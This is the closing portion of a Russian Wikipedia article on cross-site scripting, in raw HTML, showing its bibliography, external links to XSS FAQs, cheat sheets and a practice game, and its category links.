.cs1-kern-left{padding-left:0.2em}.mw-parser-output .cs1-kern-right{padding-right:0.2em}.mw-parser-output .citation .mw-selflink{font-weight:inherit}@media screen{.mw-parser-output .cs1-format{font-size:95%}html.skin-theme-clientpref-night .mw-parser-output .cs1-maint{color:#18911f}html.skin-theme-clientpref-night .mw-parser-output .id-lock-free a::after,html.skin-theme-clientpref-night .mw-parser-output .id-lock-limited a::after,html.skin-theme-clientpref-night .mw-parser-output .id-lock-registration a::after,html.skin-theme-clientpref-night .mw-parser-output .id-lock-subscription a::after{filter:invert(1)hue-rotate(180deg)}}@media screen and (prefers-color-scheme:dark){html.skin-theme-clientpref-os .mw-parser-output .cs1-maint{color:#18911f}html.skin-theme-clientpref-os .mw-parser-output .id-lock-free a::after,html.skin-theme-clientpref-os .mw-parser-output .id-lock-limited a::after,html.skin-theme-clientpref-os .mw-parser-output .id-lock-registration a::after,html.skin-theme-clientpref-os .mw-parser-output .id-lock-subscription a::after{filter:invert(1)hue-rotate(180deg)}}</style>Seth Fogie, Jeremiah Grossman, Robert Hansen, Anton Rager, Petko D. Petkov. XSS атаки: эксплуатация и защита = XSS Attacks: Cross Site Scripting Exploits and Defense. — Syngress, 2007. — 464 p. — <a href="//ru.wikipedia.org/wiki/%D0%A1%D0%BB%D1%83%D0%B6%D0%B5%D0%B1%D0%BD%D0%B0%D1%8F:%D0%98%D1%81%D1%82%D0%BE%D1%87%D0%BD%D0%B8%D0%BA%D0%B8_%D0%BA%D0%BD%D0%B8%D0%B3/1597491543" class="internal mw-magiclink-isbn">ISBN 1597491543</a>.</li><li><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r150646110">Paco Hope, Ben Walther. Web Security Testing Cookbook. — O'Reilly Media, 2008. — 314 p. — <a href="//ru.wikipedia.org/wiki/%D0%A1%D0%BB%D1%83%D0%B6%D0%B5%D0%B1%D0%BD%D0%B0%D1%8F:%D0%98%D1%81%D1%82%D0%BE%D1%87%D0%BD%D0%B8%D0%BA%D0%B8_%D0%BA%D0%BD%D0%B8%D0%B3/9780596514839" class="internal mw-magiclink-isbn">ISBN 978-0-596-51483-9</a>.</li></ul><div class="mw-heading mw-heading2"><h2 id="Ссылки">Ссылки</h2></div><style data-mw-deduplicate="TemplateStyles:r137903846">.mw-parser-output .ts-Родственные_проекты{clear:right;float:right;width:19em;box-sizing:border-box;margin:0 0 .5em 1em;padding:.4em;background:var(--background-color-neutral-subtle,#f8f9fa);border:1px solid var(--border-color-base,#a2a9b1);font-size:90%}.mw-parser-output .ts-Родственные_проекты-header{margin-bottom:.2em;padding:.2em .6em;font-size:110%}.mw-parser-output .ts-Родственные_проекты-item{display:flex;padding:.2em .6em}.mw-parser-output .ts-Родственные_проекты-image{min-width:24px;display:inline-block;margin-right:.4em;flex:none;vertical-align:top;text-align:center}.mw-parser-output .ts-Родственные_проекты-image img{vertical-align:middle}.mw-parser-output .ts-Родственные_проекты-label{align-self:center}@media(max-width:719px){.mw-parser-output .ts-Родственные_проекты{clear:none;float:none;width:auto;margin-left:0;margin-right:0}}</style><div class="ts-Родственные_проекты ruwikiWikimediaNavigation metadata plainlinks plainlist noprint" role="navigation" aria-label="В родственных проектах"><ul><li class="ts-Родственные_проекты-item"><img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/7/76/Notification-icon-Commons-logo.svg/40px-Notification-icon-Commons-logo.svg.png" decoding="async" width="24" height="24" class="mw-file-element" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/7/76/Notification-icon-Commons-logo.svg/60px-Notification-icon-Commons-logo.svg.png 2x" data-file-width="30" data-file-height="30"><a href="https://commons.wikimedia.org/wiki/Category:Cross-site_scripting" class="extiw" title="commons:Category:Cross-site scripting">Медиафайлы на Викискладе</a></li></ul></div><ul><li><a rel="nofollow" class="external text" href="http://www.cgisecurity.com/xss-faq.html">XSS FAQ</a> (англ.)</li><li><a rel="nofollow" class="external text" href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet">XSS шпаргалка</a> (англ.)</li><li><a rel="nofollow" class="external text" href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet">Еще одна XSS шпаргалка</a> (англ.)</li><li><a rel="nofollow" class="external text" href="http://html5sec.org/">HTML5 Security Cheatsheet</a></li><li><a rel="nofollow" class="external text" href="https://xss-game.appspot.com/">XSS-game от Google</a> (англ.)</li><li><a rel="nofollow" class="external text" href="https://www.virtualforge.com/vmovie/xss_lesson_1/xss_selling_platform_v1.0.swf">Флэш-анимация о Cross-Site Scripting Attack</a> (англ.)</li></ul> <style data-mw-deduplicate="TemplateStyles:r151908832">.mw-parser-output .ambox{align-items:center;border:1px solid var(--border-color-base,#a2a9b1);border-left:10px solid #36c;background:var(--background-color-neutral-subtle,#f8f9fa);box-sizing:border-box;display:flex;margin:0 10%}html body.mediawiki.skin-minerva .mw-parser-output .ambox{border-width:0 0 0 4px}.mw-parser-output .ambox+link+.ambox,.mw-parser-output .ambox+link+style+.ambox,.mw-parser-output .ambox+link+link+.ambox,.mw-parser-output .ambox+.mw-empty-elt+link+.ambox,.mw-parser-output .ambox+.mw-empty-elt+link+style+.ambox,.mw-parser-output .ambox+.mw-empty-elt+link+link+.ambox{margin-top:-1px}html body.mediawiki .mw-parser-output .ambox.mbox-small-left{margin:4px 1em 4px 0;overflow:hidden;width:238px;border-collapse:collapse;font-size:88%;line-height:1.25em}.mw-parser-output .ambox-speedy{border-left:10px solid var(--border-color-error,#b32424);background-color:var(--background-color-error-subtle,#ffe9e5)}.mw-parser-output .ambox-delete{border-left:10px solid var(--border-color-error,#b32424)}.mw-parser-output .ambox-content{border-left:10px solid #f28500}.mw-parser-output .ambox-style{border-left:10px solid var(--color-warning,#edab00)}.mw-parser-output .ambox-good{border-left:10px solid #66cc44}.mw-parser-output .ambox-discussion{border-left:10px solid #339966}.mw-parser-output .ambox-merge{border-left:10px solid #9932cc}.mw-parser-output .ambox-move{border-left:10px solid #9932cc}.mw-parser-output .ambox-protection{border-left:10px solid #a2a9b1}.mw-parser-output .ambox .mbox-text{border:none;padding:0.25em 0.5em;width:100%}.mw-parser-output .ambox .mbox-image{border:none;padding:2px 0 2px 0.5em;text-align:center}.mw-parser-output .ambox .mbox-imageright{border:none;padding:2px 0.5em 2px 0;text-align:center}.mw-parser-output .ambox .mbox-empty-cell{border:none;padding:0;width:1px}.mw-parser-output .ambox .mbox-image-div{width:52px}.mw-parser-output .ambox .mbox-textsmall-div{font-size:90%}html.client-js body.skin-minerva .mw-parser-output .mbox-text-span{margin-left:23px!important}@media(max-width:1366px){.mw-parser-output .ambox{margin-left:6%;margin-right:6%}}@media(max-width:719px){.mw-parser-output .ambox{margin-left:0;margin-right:0}}</style><div id="qa-message" class="mbox-Добротная_статья plainlinks metadata ambox ambox-good" data-qa-category-1="Компьютеры" style="margin-top: 1em;"><div class="mbox-image"><div class="mbox-image-div"><a href="//ru.wikipedia.org/wiki/%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:%D0%94%D0%BE%D0%B1%D1%80%D0%BE%D1%82%D0%BD%D1%8B%D0%B5_%D1%81%D1%82%D0%B0%D1%82%D1%8C%D0%B8" title="Википедия:Добротные статьи"><img alt="✰" src="//upload.wikimedia.org/wikipedia/commons/thumb/a/ae/Crystal_Clear_action_bookmark_Silver_approved.svg/40px-Crystal_Clear_action_bookmark_Silver_approved.svg.png" decoding="async" width="24" height="24" class="mw-file-element" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/a/ae/Crystal_Clear_action_bookmark_Silver_approved.svg/60px-Crystal_Clear_action_bookmark_Silver_approved.svg.png 2x" data-file-width="128" data-file-height="128"></a></div></div><div class="mbox-text"><div class="mbox-text-div">Эта статья входит в число <a href="//ru.wikipedia.org/wiki/%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:%D0%94%D0%BE%D0%B1%D1%80%D0%BE%D1%82%D0%BD%D1%8B%D0%B5_%D1%81%D1%82%D0%B0%D1%82%D1%8C%D0%B8" title="Википедия:Добротные статьи">добротных статей</a> русскоязычного раздела Википедии.</div><div class="mbox-textsmall-div hide-when-compact"></div></div></div></div><noscript><img src="https://ru.wikipedia.org/wiki/Special:CentralAutoLogin/start?useformat=desktop&type=1x1&usesul3=1" alt="" width="1" height="1" style="border: none; position: absolute;"></noscript><div class="printfooter" data-nosnippet="">Источник — <a dir="ltr" href="https://ru.wikipedia.org/w/index.php?title=Межсайтовый_скриптинг&oldid=149822836">https://ru.wikipedia.org/w/index.php?title=Межсайтовый_скриптинг&oldid=149822836</a></div></div><div id="catlinks" class="catlinks" data-mw-interface=""><div id="mw-normal-catlinks" class="mw-normal-catlinks"><a href="/wiki/%D0%A1%D0%BB%D1%83%D0%B6%D0%B5%D0%B1%D0%BD%D0%B0%D1%8F:%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D0%B8" title="Служебная:Категории">Категории</a>: <ul><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%A3%D1%8F%D0%B7%D0%B2%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D0%B8_%D0%B7%D0%B0%D1%89%D0%B8%D1%82%D1%8B" title="Категория:Уязвимости защиты">Уязвимости защиты</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%90%D1%82%D0%B0%D0%BA%D0%B8_%D0%B8_%D1%8D%D0%BA%D1%81%D0%BF%D0%BB%D0%BE%D0%B9%D1%82%D1%8B" title="Категория:Атаки и эксплойты">Атаки и эксплойты</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D1%8C" title="Категория:Информационная безопасность">Информационная безопасность</a></li></ul></div><div id="mw-hidden-catlinks" class="mw-hidden-catlinks mw-hidden-cats-hidden">Скрытые категории: <ul><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%A1%D1%82%D1%80%D0%B0%D0%BD%D0%B8%D1%86%D1%8B,_%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8E%D1%89%D0%B8%D0%B5_%D1%83%D1%81%D1%82%D0%B0%D1%80%D0%B5%D0%B2%D1%88%D0%B8%D0%B9_%D1%82%D0%B5%D0%B3_source" title="Категория:Страницы, использующие устаревший тег source">Страницы, использующие устаревший тег source</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D0%B8_%D1%81_%D0%BD%D0%B5%D1%80%D0%B0%D0%B1%D0%BE%D1%87%D0%B8%D0%BC%D0%B8_%D1%81%D1%81%D1%8B%D0%BB%D0%BA%D0%B0%D0%BC%D0%B8" title="Категория:Википедия:Статьи с нерабочими ссылками">Википедия:Статьи с нерабочими ссылками</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:Cite_web_(%D0%BD%D0%B5_%D1%83%D0%BA%D0%B0%D0%B7%D0%B0%D0%BD_%D1%8F%D0%B7%D1%8B%D0%BA)" title="Категория:Википедия:Cite web (не указан язык)">Википедия:Cite web (не указан язык)</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:%D0%97%D0%B0%D0%BF%D1%80%D0%BE%D1%81%D1%8B_%D0%BD%D0%B0_%D0%BF%D0%B5%D1%80%D0%B5%D0%B2%D0%BE%D0%B4_%D1%81_%D0%B0%D0%BD%D0%B3%D0%BB%D0%B8%D0%B9%D1%81%D0%BA%D0%BE%D0%B3%D0%BE" title="Категория:Википедия:Запросы на перевод с английского">Википедия:Запросы на перевод с английского</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D0%B8_%D1%81_%D1%88%D0%B0%D0%B1%D0%BB%D0%BE%D0%BD%D0%B0%D0%BC%D0%B8_%D0%BD%D0%B5%D0%B4%D0%BE%D1%81%D1%82%D0%B0%D1%82%D0%BA%D0%BE%D0%B2_%D0%BF%D0%BE_%D0%B0%D0%BB%D1%84%D0%B0%D0%B2%D0%B8%D1%82%D1%83" title="Категория:Википедия:Статьи с шаблонами недостатков по алфавиту">Википедия:Статьи с шаблонами недостатков по алфавиту</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D0%B8_%D1%81%D0%BE_%D1%81%D1%81%D1%8B%D0%BB%D0%BA%D0%B0%D0%BC%D0%B8_%D0%BD%D0%B0_%D0%92%D0%B8%D0%BA%D0%B8%D1%81%D0%BA%D0%BB%D0%B0%D0%B4" title="Категория:Статьи со ссылками на Викисклад">Статьи со ссылками на Викисклад</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:%D0%94%D0%BE%D0%B1%D1%80%D0%BE%D1%82%D0%BD%D1%8B%D0%B5_%D1%81%D1%82%D0%B0%D1%82%D1%8C%D0%B8:%D0%9A%D0%BE%D0%BC%D0%BF%D1%8C%D1%8E%D1%82%D0%B5%D1%80%D1%8B" title="Категория:Википедия:Добротные статьи:Компьютеры">Википедия:Добротные статьи:Компьютеры</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%92%D0%B8%D0%BA%D0%B8%D0%BF%D0%B5%D0%B4%D0%B8%D1%8F:%D0%94%D0%BE%D0%B1%D1%80%D0%BE%D1%82%D0%BD%D1%8B%D0%B5_%D1%81%D1%82%D0%B0%D1%82%D1%8C%D0%B8_%D0%BF%D0%BE_%D0%B0%D0%BB%D1%84%D0%B0%D0%B2%D0%B8%D1%82%D1%83" title="Категория:Википедия:Добротные статьи по алфавиту">Википедия:Добротные статьи по алфавиту</a></li><li><a href="/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%A1%D1%82%D1%80%D0%B0%D0%BD%D0%B8%D1%86%D1%8B,_%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8E%D1%89%D0%B8%D0%B5_%D0%B2%D0%BE%D0%BB%D1%88%D0%B5%D0%B1%D0%BD%D1%8B%D0%B5_%D1%81%D1%81%D1%8B%D0%BB%D0%BA%D0%B8_ISBN" title="Категория:Страницы, использующие волшебные ссылки ISBN">Страницы, использующие волшебные ссылки ISBN</a></li></ul></div></div></div> </div> <div class="right-block"> <div> </div> </div> </div>  <div ></div></body></html>

[1]

[2]

[3]

[4]

[5]

[6]

[7]

[8]

[9]

[10]

[11]

[12]

[13]

[14]

[15]

[16]

[17]

[18]

[19]

[20]

[21]

[22]

[23]